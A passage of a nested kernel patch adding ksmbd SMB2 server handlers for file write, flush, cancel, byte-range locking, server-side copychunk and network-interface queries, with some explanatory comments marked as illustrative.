++	if (test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_PIPE)) {
++		ksmbd_debug(SMB, "IPC pipe write request\n");
++		return smb2_write_pipe(work);
++	}
++
++	offset = le64_to_cpu(req->Offset);
++	length = le32_to_cpu(req->Length);
++
++	if (req->Channel == SMB2_CHANNEL_RDMA_V1 ||
++	    req->Channel == SMB2_CHANNEL_RDMA_V1_INVALIDATE) {
++		is_rdma_channel = true;
++		max_write_size = get_smbd_max_read_write_size();
++		length = le32_to_cpu(req->RemainingBytes);
++	}
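++	/*
++	 * Note (illustrative): for RDMA channels the payload is not
++	 * carried in the SMB2 packet itself, so Length and DataOffset
++	 * must be zero (checked below) and RemainingBytes gives the
++	 * number of bytes to pull from the client via RDMA read.
++	 */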
++
++	if (is_rdma_channel) {
++		unsigned int ch_offset = le16_to_cpu(req->WriteChannelInfoOffset);
++
++		if (req->Length != 0 || req->DataOffset != 0 ||
++		    ch_offset < offsetof(struct smb2_write_req, Buffer)) {
++			err = -EINVAL;
++			goto out;
++		}
++		err = smb2_set_remote_key_for_rdma(work,
++						   (struct smb2_buffer_desc_v1 *)
++						   ((char *)req + ch_offset),
++						   req->Channel,
++						   req->WriteChannelInfoLength);
++		if (err)
++			goto out;
++	}
++
++	if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++		ksmbd_debug(SMB, "User does not have write permission\n");
++		err = -EACCES;
++		goto out;
++	}
++
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp) {
++		err = -ENOENT;
++		goto out;
++	}
++
++	if (!(fp->daccess & (FILE_WRITE_DATA_LE | FILE_READ_ATTRIBUTES_LE))) {
++		pr_err("Not permitted to write : 0x%x\n", fp->daccess);
++		err = -EACCES;
++		goto out;
++	}
++
++	if (length > max_write_size) {
++		ksmbd_debug(SMB, "limiting write size to max size(%u)\n",
++			    max_write_size);
++		err = -EINVAL;
++		goto out;
++	}
++
++	ksmbd_debug(SMB, "flags %u\n", le32_to_cpu(req->Flags));
++	if (le32_to_cpu(req->Flags) & SMB2_WRITEFLAG_WRITE_THROUGH)
++		writethrough = true;
++
++	if (!is_rdma_channel) {
++		if (le16_to_cpu(req->DataOffset) <
++		    offsetof(struct smb2_write_req, Buffer)) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		data_buf = (char *)(((char *)&req->hdr.ProtocolId) +
++				    le16_to_cpu(req->DataOffset));
++
++		ksmbd_debug(SMB, "filename %pD, offset %lld, len %zu\n",
++			    fp->filp, offset, length);
++		err = ksmbd_vfs_write(work, fp, data_buf, length, &offset,
++				      writethrough, &nbytes);
++		if (err < 0)
++			goto out;
++	} else {
++		/* read data from the client using rdma channel, and
++		 * write the data.
++		 */
++		nbytes = smb2_write_rdma_channel(work, req, fp, offset, length,
++						 writethrough);
++		if (nbytes < 0) {
++			err = (int)nbytes;
++			goto out;
++		}
++	}
++
++	rsp->StructureSize = cpu_to_le16(17);
++	rsp->DataOffset = 0;
++	rsp->Reserved = 0;
++	rsp->DataLength = cpu_to_le32(nbytes);
++	rsp->DataRemaining = 0;
++	rsp->Reserved2 = 0;
++	inc_rfc1001_len(work->response_buf, 16);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++out:
++	if (err == -EAGAIN)
++		rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++	else if (err == -ENOSPC || err == -EFBIG)
++		rsp->hdr.Status = STATUS_DISK_FULL;
++	else if (err == -ENOENT)
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++	else if (err == -EACCES)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (err == -ESHARE)
++		rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++	else if (err == -EINVAL)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	else
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++/**
++ * smb2_flush() - handler for smb2 flush file - fsync
++ * @work:	smb work containing flush command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_flush(struct ksmbd_work *work)
++{
++	struct smb2_flush_req *req;
++	struct smb2_flush_rsp *rsp;
++	int err;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	ksmbd_debug(SMB, "SMB2_FLUSH called for fid %llu\n", req->VolatileFileId);
++
++	err = ksmbd_vfs_fsync(work, req->VolatileFileId, req->PersistentFileId);
++	if (err)
++		goto out;
++
++	rsp->StructureSize = cpu_to_le16(4);
++	rsp->Reserved = 0;
++	inc_rfc1001_len(work->response_buf, 4);
++	return 0;
++
++out:
++	if (err) {
++		rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		smb2_set_err_rsp(work);
++	}
++
++	return err;
++}
++
++/**
++ * smb2_cancel() - handler for smb2 cancel command
++ * @work:	smb work containing cancel command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_cancel(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++	struct smb2_hdr *chdr;
++	struct ksmbd_work *iter;
++	struct list_head *command_list;
++
++	ksmbd_debug(SMB, "smb2 cancel called on mid %llu, async flags 0x%x\n",
++		    hdr->MessageId, hdr->Flags);
++
++	if (hdr->Flags & SMB2_FLAGS_ASYNC_COMMAND) {
++		command_list = &conn->async_requests;
++
++		spin_lock(&conn->request_lock);
++		list_for_each_entry(iter, command_list,
++				    async_request_entry) {
++			chdr = smb2_get_msg(iter->request_buf);
++
++			if (iter->async_id !=
++			    le64_to_cpu(hdr->Id.AsyncId))
++				continue;
++
++			ksmbd_debug(SMB,
++				    "smb2 with AsyncId %llu cancelled command = 0x%x\n",
++				    le64_to_cpu(hdr->Id.AsyncId),
++				    le16_to_cpu(chdr->Command));
++			iter->state = KSMBD_WORK_CANCELLED;
++			if (iter->cancel_fn)
++				iter->cancel_fn(iter->cancel_argv);
++			break;
++		}
++		spin_unlock(&conn->request_lock);
++	} else {
++		command_list = &conn->requests;
++
++		spin_lock(&conn->request_lock);
++		list_for_each_entry(iter, command_list, request_entry) {
++			chdr = smb2_get_msg(iter->request_buf);
++
++			if (chdr->MessageId != hdr->MessageId ||
++			    iter == work)
++				continue;
++
++			ksmbd_debug(SMB,
++				    "smb2 with mid %llu cancelled command = 0x%x\n",
++				    le64_to_cpu(hdr->MessageId),
++				    le16_to_cpu(chdr->Command));
++			iter->state = KSMBD_WORK_CANCELLED;
++			break;
++		}
++		spin_unlock(&conn->request_lock);
++	}
++
++	/* For the SMB2_CANCEL command itself, send no response */
++	work->send_no_response = 1;
++	return 0;
++}
++
++struct file_lock *smb_flock_init(struct file *f)
++{
++	struct file_lock *fl;
++
++	fl = locks_alloc_lock();
++	if (!fl)
++		goto out;
++
++	locks_init_lock(fl);
++
++	fl->fl_owner = f;
++	fl->fl_pid = current->tgid;
++	fl->fl_file = f;
++	fl->fl_flags = FL_POSIX;
++	fl->fl_ops = NULL;
++	fl->fl_lmops = NULL;
++
++out:
++	return fl;
++}
++
++static int smb2_set_flock_flags(struct file_lock *flock, int flags)
++{
++	int cmd = -EINVAL;
++
++	/* Check for an invalid flag combination in the lock request */
++	switch (flags) {
++	case SMB2_LOCKFLAG_SHARED:
++		ksmbd_debug(SMB, "received shared request\n");
++		cmd = F_SETLKW;
++		flock->fl_type = F_RDLCK;
++		flock->fl_flags |= FL_SLEEP;
++		break;
++	case SMB2_LOCKFLAG_EXCLUSIVE:
++		ksmbd_debug(SMB, "received exclusive request\n");
++		cmd = F_SETLKW;
++		flock->fl_type = F_WRLCK;
++		flock->fl_flags |= FL_SLEEP;
++		break;
++	case SMB2_LOCKFLAG_SHARED | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
++		ksmbd_debug(SMB,
++			    "received shared & fail immediately request\n");
++		cmd = F_SETLK;
++		flock->fl_type = F_RDLCK;
++		break;
++	case SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_FAIL_IMMEDIATELY:
++		ksmbd_debug(SMB,
++			    "received exclusive & fail immediately request\n");
++		cmd = F_SETLK;
++		flock->fl_type = F_WRLCK;
++		break;
++	case SMB2_LOCKFLAG_UNLOCK:
++		ksmbd_debug(SMB, "received unlock request\n");
++		flock->fl_type = F_UNLCK;
++		cmd = 0;
++		break;
++	}
++
++	return cmd;
++}
++
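++/*
++ * Summary of the mapping in smb2_set_flock_flags() (illustrative):
++ *   SHARED                       -> F_RDLCK, blocking (F_SETLKW)
++ *   EXCLUSIVE                    -> F_WRLCK, blocking (F_SETLKW)
++ *   SHARED | FAIL_IMMEDIATELY    -> F_RDLCK, non-blocking (F_SETLK)
++ *   EXCLUSIVE | FAIL_IMMEDIATELY -> F_WRLCK, non-blocking (F_SETLK)
++ *   UNLOCK                       -> F_UNLCK, cmd 0
++ * Any other combination leaves cmd at -EINVAL and is rejected later.
++ */
++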
++static struct ksmbd_lock *smb2_lock_init(struct file_lock *flock,
++					 unsigned int cmd, int flags,
++					 struct list_head *lock_list)
++{
++	struct ksmbd_lock *lock;
++
++	lock = kzalloc(sizeof(struct ksmbd_lock), GFP_KERNEL);
++	if (!lock)
++		return NULL;
++
++	lock->cmd = cmd;
++	lock->fl = flock;
++	lock->start = flock->fl_start;
++	lock->end = flock->fl_end;
++	lock->flags = flags;
++	if (lock->start == lock->end)
++		lock->zero_len = 1;
++	INIT_LIST_HEAD(&lock->clist);
++	INIT_LIST_HEAD(&lock->flist);
++	INIT_LIST_HEAD(&lock->llist);
++	list_add_tail(&lock->llist, lock_list);
++
++	return lock;
++}
++
++static void smb2_remove_blocked_lock(void **argv)
++{
++	struct file_lock *flock = (struct file_lock *)argv[0];
++
++	ksmbd_vfs_posix_lock_unblock(flock);
++	wake_up(&flock->fl_wait);
++}
++
++static inline bool lock_defer_pending(struct file_lock *fl)
++{
++	/* check pending lock waiters */
++	return waitqueue_active(&fl->fl_wait);
++}
++
++/**
++ * smb2_lock() - handler for smb2 file lock command
++ * @work:	smb work containing lock command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_lock(struct ksmbd_work *work)
++{
++	struct smb2_lock_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_lock_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_lock_element *lock_ele;
++	struct ksmbd_file *fp = NULL;
++	struct file_lock *flock = NULL;
++	struct file *filp = NULL;
++	int lock_count;
++	int flags = 0;
++	int cmd = 0;
++	int err = -EIO, i, rc = 0;
++	u64 lock_start, lock_length;
++	struct ksmbd_lock *smb_lock = NULL, *cmp_lock, *tmp, *tmp2;
++	struct ksmbd_conn *conn;
++	int nolock = 0;
++	LIST_HEAD(lock_list);
++	LIST_HEAD(rollback_list);
++	int prior_lock = 0;
++
++	ksmbd_debug(SMB, "Received lock request\n");
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp) {
++		ksmbd_debug(SMB, "Invalid file id for lock : %llu\n", req->VolatileFileId);
++		err = -ENOENT;
++		goto out2;
++	}
++
++	filp = fp->filp;
++	lock_count = le16_to_cpu(req->LockCount);
++	lock_ele = req->locks;
++
++	ksmbd_debug(SMB, "lock count is %d\n", lock_count);
++	if (!lock_count) {
++		err = -EINVAL;
++		goto out2;
++	}
++
++	for (i = 0; i < lock_count; i++) {
++		flags = le32_to_cpu(lock_ele[i].Flags);
++
++		flock = smb_flock_init(filp);
++		if (!flock)
++			goto out;
++
++		cmd = smb2_set_flock_flags(flock, flags);
++
++		lock_start = le64_to_cpu(lock_ele[i].Offset);
++		lock_length = le64_to_cpu(lock_ele[i].Length);
++		if (lock_start > U64_MAX - lock_length) {
++			pr_err("Invalid lock range requested\n");
++			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			goto out;
++		}
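++		/*
++		 * Example of the overflow check above (illustrative):
++		 * Offset = U64_MAX - 10 with Length = 20 would wrap
++		 * around U64_MAX, so the range is rejected instead of
++		 * being silently truncated.
++		 */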
++
++		if (lock_start > OFFSET_MAX)
++			flock->fl_start = OFFSET_MAX;
++		else
++			flock->fl_start = lock_start;
++
++		lock_length = le64_to_cpu(lock_ele[i].Length);
++		if (lock_length > OFFSET_MAX - flock->fl_start)
++			lock_length = OFFSET_MAX - flock->fl_start;
++
++		flock->fl_end = flock->fl_start + lock_length;
++
++		if (flock->fl_end < flock->fl_start) {
++			ksmbd_debug(SMB,
++				    "the end offset(%llx) is smaller than the start offset(%llx)\n",
++				    flock->fl_end, flock->fl_start);
++			rsp->hdr.Status = STATUS_INVALID_LOCK_RANGE;
++			goto out;
++		}
++
++		/* Check conflict locks in one request */
++		list_for_each_entry(cmp_lock, &lock_list, llist) {
++			if (cmp_lock->fl->fl_start <= flock->fl_start &&
++			    cmp_lock->fl->fl_end >= flock->fl_end) {
++				if (cmp_lock->fl->fl_type != F_UNLCK &&
++				    flock->fl_type != F_UNLCK) {
++					pr_err("conflict two locks in one request\n");
++					err = -EINVAL;
++					goto out;
++				}
++			}
++		}
++
++		smb_lock = smb2_lock_init(flock, cmd, flags, &lock_list);
++		if (!smb_lock) {
++			err = -EINVAL;
++			goto out;
++		}
++	}
++
++	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
++		if (smb_lock->cmd < 0) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		if (!(smb_lock->flags & SMB2_LOCKFLAG_MASK)) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		if ((prior_lock & (SMB2_LOCKFLAG_EXCLUSIVE | SMB2_LOCKFLAG_SHARED) &&
++		     smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) ||
++		    (prior_lock == SMB2_LOCKFLAG_UNLOCK &&
++		     !(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK))) {
++			err = -EINVAL;
++			goto out;
++		}
++
++		prior_lock = smb_lock->flags;
++
++		if (!(smb_lock->flags & SMB2_LOCKFLAG_UNLOCK) &&
++		    !(smb_lock->flags & SMB2_LOCKFLAG_FAIL_IMMEDIATELY))
++			goto no_check_cl;
++
++		nolock = 1;
++		/* check locks in connection list */
++		down_read(&conn_list_lock);
++		list_for_each_entry(conn, &conn_list, conns_list) {
++			spin_lock(&conn->llist_lock);
++			list_for_each_entry_safe(cmp_lock, tmp2, &conn->lock_list, clist) {
++				if (file_inode(cmp_lock->fl->fl_file) !=
++				    file_inode(smb_lock->fl->fl_file))
++					continue;
++
++				if (smb_lock->fl->fl_type == F_UNLCK) {
++					if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file &&
++					    cmp_lock->start == smb_lock->start &&
++					    cmp_lock->end == smb_lock->end &&
++					    !lock_defer_pending(cmp_lock->fl)) {
++						nolock = 0;
++						list_del(&cmp_lock->flist);
++						list_del(&cmp_lock->clist);
++						spin_unlock(&conn->llist_lock);
++						up_read(&conn_list_lock);
++
++						locks_free_lock(cmp_lock->fl);
++						kfree(cmp_lock);
++						goto out_check_cl;
++					}
++					continue;
++				}
++
++				if (cmp_lock->fl->fl_file == smb_lock->fl->fl_file) {
++					if (smb_lock->flags & SMB2_LOCKFLAG_SHARED)
++						continue;
++				} else {
++					if (cmp_lock->flags & SMB2_LOCKFLAG_SHARED)
++						continue;
++				}
++
++				/* check zero byte lock range */
++				if (cmp_lock->zero_len && !smb_lock->zero_len &&
++				    cmp_lock->start > smb_lock->start &&
++				    cmp_lock->start < smb_lock->end) {
++					spin_unlock(&conn->llist_lock);
++					up_read(&conn_list_lock);
++					pr_err("previous lock conflict with zero byte lock range\n");
++					goto out;
++				}
++
++				if (smb_lock->zero_len && !cmp_lock->zero_len &&
++				    smb_lock->start > cmp_lock->start &&
++				    smb_lock->start < cmp_lock->end) {
++					spin_unlock(&conn->llist_lock);
++					up_read(&conn_list_lock);
++					pr_err("current lock conflict with zero byte lock range\n");
++					goto out;
++				}
++
++				if (((cmp_lock->start <= smb_lock->start &&
++				      cmp_lock->end > smb_lock->start) ||
++				     (cmp_lock->start < smb_lock->end &&
++				      cmp_lock->end >= smb_lock->end)) &&
++				    !cmp_lock->zero_len && !smb_lock->zero_len) {
++					spin_unlock(&conn->llist_lock);
++					up_read(&conn_list_lock);
++					pr_err("Not allow lock operation on exclusive lock range\n");
++					goto out;
++				}
++			}
++			spin_unlock(&conn->llist_lock);
++		}
++		up_read(&conn_list_lock);
++out_check_cl:
++		if (smb_lock->fl->fl_type == F_UNLCK && nolock) {
++			pr_err("Try to unlock nolocked range\n");
++			rsp->hdr.Status = STATUS_RANGE_NOT_LOCKED;
++			goto out;
++		}
++
++no_check_cl:
++		if (smb_lock->zero_len) {
++			err = 0;
++			goto skip;
++		}
++
++		flock = smb_lock->fl;
++		list_del(&smb_lock->llist);
++retry:
++		rc = vfs_lock_file(filp, smb_lock->cmd, flock, NULL);
++skip:
++		if (flags & SMB2_LOCKFLAG_UNLOCK) {
++			if (!rc) {
++				ksmbd_debug(SMB, "File unlocked\n");
++			} else if (rc == -ENOENT) {
++				rsp->hdr.Status = STATUS_NOT_LOCKED;
++				goto out;
++			}
++			locks_free_lock(flock);
++			kfree(smb_lock);
++		} else {
++			if (rc == FILE_LOCK_DEFERRED) {
++				void **argv;
++
++				ksmbd_debug(SMB,
++					    "would have to wait for getting lock\n");
++				spin_lock(&work->conn->llist_lock);
++				list_add_tail(&smb_lock->clist,
++					      &work->conn->lock_list);
++				spin_unlock(&work->conn->llist_lock);
++				list_add(&smb_lock->llist, &rollback_list);
++
++				argv = kmalloc(sizeof(void *), GFP_KERNEL);
++				if (!argv) {
++					err = -ENOMEM;
++					goto out;
++				}
++				argv[0] = flock;
++
++				rc = setup_async_work(work,
++						      smb2_remove_blocked_lock,
++						      argv);
++				if (rc) {
++					err = -ENOMEM;
++					goto out;
++				}
++				spin_lock(&fp->f_lock);
++				list_add(&work->fp_entry, &fp->blocked_works);
++				spin_unlock(&fp->f_lock);
++
++				smb2_send_interim_resp(work, STATUS_PENDING);
++
++				ksmbd_vfs_posix_lock_wait(flock);
++
++				spin_lock(&work->conn->request_lock);
++				spin_lock(&fp->f_lock);
++				list_del(&work->fp_entry);
++				work->cancel_fn = NULL;
++				kfree(argv);
++				spin_unlock(&fp->f_lock);
++				spin_unlock(&work->conn->request_lock);
++
++				if (work->state != KSMBD_WORK_ACTIVE) {
++					list_del(&smb_lock->llist);
++					spin_lock(&work->conn->llist_lock);
++					list_del(&smb_lock->clist);
++					spin_unlock(&work->conn->llist_lock);
++					locks_free_lock(flock);
++
++					if (work->state == KSMBD_WORK_CANCELLED) {
++						rsp->hdr.Status =
++							STATUS_CANCELLED;
++						kfree(smb_lock);
++						smb2_send_interim_resp(work,
++								       STATUS_CANCELLED);
++						work->send_no_response = 1;
++						goto out;
++					}
++					init_smb2_rsp_hdr(work);
++					smb2_set_err_rsp(work);
++					rsp->hdr.Status =
++						STATUS_RANGE_NOT_LOCKED;
++					kfree(smb_lock);
++					goto out2;
++				}
++
++				list_del(&smb_lock->llist);
++				spin_lock(&work->conn->llist_lock);
++				list_del(&smb_lock->clist);
++				spin_unlock(&work->conn->llist_lock);
++
++				goto retry;
++			} else if (!rc) {
++				spin_lock(&work->conn->llist_lock);
++				list_add_tail(&smb_lock->clist,
++					      &work->conn->lock_list);
++				list_add_tail(&smb_lock->flist,
++					      &fp->lock_list);
++				spin_unlock(&work->conn->llist_lock);
++				list_add(&smb_lock->llist, &rollback_list);
++				ksmbd_debug(SMB, "successful in taking lock\n");
++			} else {
++				goto out;
++			}
++		}
++	}
++
++	if (atomic_read(&fp->f_ci->op_count) > 1)
++		smb_break_all_oplock(work, fp);
++
++	rsp->StructureSize = cpu_to_le16(4);
++	ksmbd_debug(SMB, "successful in taking lock\n");
++	rsp->hdr.Status = STATUS_SUCCESS;
++	rsp->Reserved = 0;
++	inc_rfc1001_len(work->response_buf, 4);
++	ksmbd_fd_put(work, fp);
++	return 0;
++
++out:
++	list_for_each_entry_safe(smb_lock, tmp, &lock_list, llist) {
++		locks_free_lock(smb_lock->fl);
++		list_del(&smb_lock->llist);
++		kfree(smb_lock);
++	}
++
++	list_for_each_entry_safe(smb_lock, tmp, &rollback_list, llist) {
++		struct file_lock *rlock = NULL;
++
++		rlock = smb_flock_init(filp);
++		rlock->fl_type = F_UNLCK;
++		rlock->fl_start = smb_lock->start;
++		rlock->fl_end = smb_lock->end;
++
++		rc = vfs_lock_file(filp, 0, rlock, NULL);
++		if (rc)
++			pr_err("rollback unlock fail : %d\n", rc);
++
++		list_del(&smb_lock->llist);
++		spin_lock(&work->conn->llist_lock);
++		if (!list_empty(&smb_lock->flist))
++			list_del(&smb_lock->flist);
++		list_del(&smb_lock->clist);
++		spin_unlock(&work->conn->llist_lock);
++
++		locks_free_lock(smb_lock->fl);
++		locks_free_lock(rlock);
++		kfree(smb_lock);
++	}
++out2:
++	ksmbd_debug(SMB, "failed in taking lock(flags : %x), err : %d\n", flags, err);
++
++	if (!rsp->hdr.Status) {
++		if (err == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else if (err == -ENOMEM)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		else if (err == -ENOENT)
++			rsp->hdr.Status = STATUS_FILE_CLOSED;
++		else
++			rsp->hdr.Status = STATUS_LOCK_NOT_GRANTED;
++	}
++
++	smb2_set_err_rsp(work);
++	ksmbd_fd_put(work, fp);
++	return err;
++}
++
++static int fsctl_copychunk(struct ksmbd_work *work,
++			   struct copychunk_ioctl_req *ci_req,
++			   unsigned int cnt_code,
++			   unsigned int input_count,
++			   unsigned long long volatile_id,
++			   unsigned long long persistent_id,
++			   struct smb2_ioctl_rsp *rsp)
++{
++	struct copychunk_ioctl_rsp *ci_rsp;
++	struct ksmbd_file *src_fp = NULL, *dst_fp = NULL;
++	struct srv_copychunk *chunks;
++	unsigned int i, chunk_count, chunk_count_written = 0;
++	unsigned int chunk_size_written = 0;
++	loff_t total_size_written = 0;
++	int ret = 0;
++
++	ci_rsp = (struct copychunk_ioctl_rsp *)&rsp->Buffer[0];
++
++	rsp->VolatileFileId = volatile_id;
++	rsp->PersistentFileId = persistent_id;
++	ci_rsp->ChunksWritten =
++		cpu_to_le32(ksmbd_server_side_copy_max_chunk_count());
++	ci_rsp->ChunkBytesWritten =
++		cpu_to_le32(ksmbd_server_side_copy_max_chunk_size());
++	ci_rsp->TotalBytesWritten =
++		cpu_to_le32(ksmbd_server_side_copy_max_total_size());
++
++	chunks = (struct srv_copychunk *)&ci_req->Chunks[0];
++	chunk_count = le32_to_cpu(ci_req->ChunkCount);
++	if (chunk_count == 0)
++		goto out;
++	total_size_written = 0;
++
++	/* verify the SRV_COPYCHUNK_COPY packet */
++	if (chunk_count > ksmbd_server_side_copy_max_chunk_count() ||
++	    input_count < offsetof(struct copychunk_ioctl_req, Chunks) +
++	     chunk_count * sizeof(struct srv_copychunk)) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		return -EINVAL;
++	}
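++	/*
++	 * Worked example (illustrative, assuming the 24-byte on-wire
++	 * srv_copychunk layout: 8-byte source offset, 8-byte target
++	 * offset, 4-byte length, 4-byte reserved): ChunkCount = 4
++	 * requires input_count >= offsetof(Chunks) + 4 * 24 bytes.
++	 */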
++
++	for (i = 0; i < chunk_count; i++) {
++		if (le32_to_cpu(chunks[i].Length) == 0 ||
++		    le32_to_cpu(chunks[i].Length) > ksmbd_server_side_copy_max_chunk_size())
++			break;
++		total_size_written += le32_to_cpu(chunks[i].Length);
++	}
++
++	if (i < chunk_count ||
++	    total_size_written > ksmbd_server_side_copy_max_total_size()) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		return -EINVAL;
++	}
++
++	src_fp = ksmbd_lookup_foreign_fd(work,
++					 le64_to_cpu(ci_req->ResumeKey[0]));
++	dst_fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
++	ret = -EINVAL;
++	if (!src_fp ||
++	    src_fp->persistent_id != le64_to_cpu(ci_req->ResumeKey[1])) {
++		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
++		goto out;
++	}
++
++	if (!dst_fp) {
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++		goto out;
++	}
++
++	/*
++	 * FILE_READ_DATA should only be included in
++	 * the FSCTL_COPYCHUNK case
++	 */
++	if (cnt_code == FSCTL_COPYCHUNK &&
++	    !(dst_fp->daccess & (FILE_READ_DATA_LE | FILE_GENERIC_READ_LE))) {
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		goto out;
++	}
++
++	ret = ksmbd_vfs_copy_file_ranges(work, src_fp, dst_fp,
++					 chunks, chunk_count,
++					 &chunk_count_written,
++					 &chunk_size_written,
++					 &total_size_written);
++	if (ret < 0) {
++		if (ret == -EACCES)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (ret == -EAGAIN)
++			rsp->hdr.Status = STATUS_FILE_LOCK_CONFLICT;
++		else if (ret == -EBADF)
++			rsp->hdr.Status = STATUS_INVALID_HANDLE;
++		else if (ret == -EFBIG || ret == -ENOSPC)
++			rsp->hdr.Status = STATUS_DISK_FULL;
++		else if (ret == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else if (ret == -EISDIR)
++			rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
++		else if (ret == -E2BIG)
++			rsp->hdr.Status = STATUS_INVALID_VIEW_SIZE;
++		else
++			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++	}
++
++	ci_rsp->ChunksWritten = cpu_to_le32(chunk_count_written);
++	ci_rsp->ChunkBytesWritten = cpu_to_le32(chunk_size_written);
++	ci_rsp->TotalBytesWritten = cpu_to_le32(total_size_written);
++out:
++	ksmbd_fd_put(work, src_fp);
++	ksmbd_fd_put(work, dst_fp);
++	return ret;
++}
++
++static __be32 idev_ipv4_address(struct in_device *idev)
++{
++	__be32 addr = 0;
++
++	struct in_ifaddr *ifa;
++
++	rcu_read_lock();
++	in_dev_for_each_ifa_rcu(ifa, idev) {
++		if (ifa->ifa_flags & IFA_F_SECONDARY)
++			continue;
++
++		addr = ifa->ifa_address;
++		break;
++	}
++	rcu_read_unlock();
++	return addr;
++}
++
++static int fsctl_query_iface_info_ioctl(struct ksmbd_conn *conn,
++					struct smb2_ioctl_rsp *rsp,
++					unsigned int out_buf_len)
++{
++	struct network_interface_info_ioctl_rsp *nii_rsp = NULL;
++	int nbytes = 0;
++	struct net_device *netdev;
++	struct sockaddr_storage_rsp *sockaddr_storage;
++	unsigned int flags;
++	unsigned long long speed;
++
++	rtnl_lock();
++	for_each_netdev(&init_net, netdev) {
++		bool ipv4_set = false;
++
++		if (netdev->type == ARPHRD_LOOPBACK)
++			continue;
++
++		flags = dev_get_flags(netdev);
++		if (!(flags & IFF_RUNNING))
++			continue;
++ipv6_retry:
++		if (out_buf_len <
++		    nbytes + sizeof(struct network_interface_info_ioctl_rsp)) {
++			rtnl_unlock();
++			return -ENOSPC;
++		}
++
++		nii_rsp = (struct network_interface_info_ioctl_rsp *)
++				&rsp->Buffer[nbytes];
++		nii_rsp->IfIndex = cpu_to_le32(netdev->ifindex);
++
++		nii_rsp->Capability = 0;
++		if (netdev->real_num_tx_queues > 1)
++			nii_rsp->Capability |= cpu_to_le32(RSS_CAPABLE);
++		if (ksmbd_rdma_capable_netdev(netdev))
++			nii_rsp->Capability |= cpu_to_le32(RDMA_CAPABLE);
++
++		nii_rsp->Next = cpu_to_le32(152);
++		nii_rsp->Reserved = 0;
++
++		if (netdev->ethtool_ops->get_link_ksettings) {
++			struct ethtool_link_ksettings cmd;
++
++			netdev->ethtool_ops->get_link_ksettings(netdev, &cmd);
++			speed = cmd.base.speed;
++		} else {
++			ksmbd_debug(SMB, "%s %s\n", netdev->name,
++				    "speed is unknown, defaulting to 1Gb/sec");
++			speed = SPEED_1000;
++		}
++
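++		/*
++		 * Illustrative conversion: ethtool reports link speed
++		 * in Mb/s while LinkSpeed is in bits per second, e.g.
++		 * SPEED_1000 becomes 1,000,000,000 after the multiply
++		 * below.
++		 */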
++		speed *= 1000000;
++		nii_rsp->LinkSpeed = cpu_to_le64(speed);
++
++		sockaddr_storage = (struct sockaddr_storage_rsp *)
++					nii_rsp->SockAddr_Storage;
++		memset(sockaddr_storage, 0, 128);
++
++		if (!ipv4_set) {
++			struct in_device *idev;
++
++			sockaddr_storage->Family = cpu_to_le16(INTERNETWORK);
++			sockaddr_storage->addr4.Port = 0;
++
++			idev = __in_dev_get_rtnl(netdev);
++			if (!idev)
++				continue;
++			sockaddr_storage->addr4.IPv4address =
++						idev_ipv4_address(idev);
++			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
++			ipv4_set = true;
++			goto ipv6_retry;
++		} else {
++			struct inet6_dev *idev6;
++			struct inet6_ifaddr *ifa;
++			__u8 *ipv6_addr = sockaddr_storage->addr6.IPv6address;
++
++			sockaddr_storage->Family = cpu_to_le16(INTERNETWORKV6);
++			sockaddr_storage->addr6.Port = 0;
++			sockaddr_storage->addr6.FlowInfo = 0;
++
++			idev6 = __in6_dev_get(netdev);
++			if (!idev6)
++				continue;
++
++			list_for_each_entry(ifa, &idev6->addr_list, if_list) {
++				if (ifa->flags & (IFA_F_TENTATIVE |
++							IFA_F_DEPRECATED))
++					continue;
++				memcpy(ipv6_addr, ifa->addr.s6_addr, 16);
++				break;
++			}
++			sockaddr_storage->addr6.ScopeId = 0;
++			nbytes += sizeof(struct network_interface_info_ioctl_rsp);
++		}
++	}
++	rtnl_unlock();
++
++	/* zero out Next if this is the last entry */
++	if (nii_rsp)
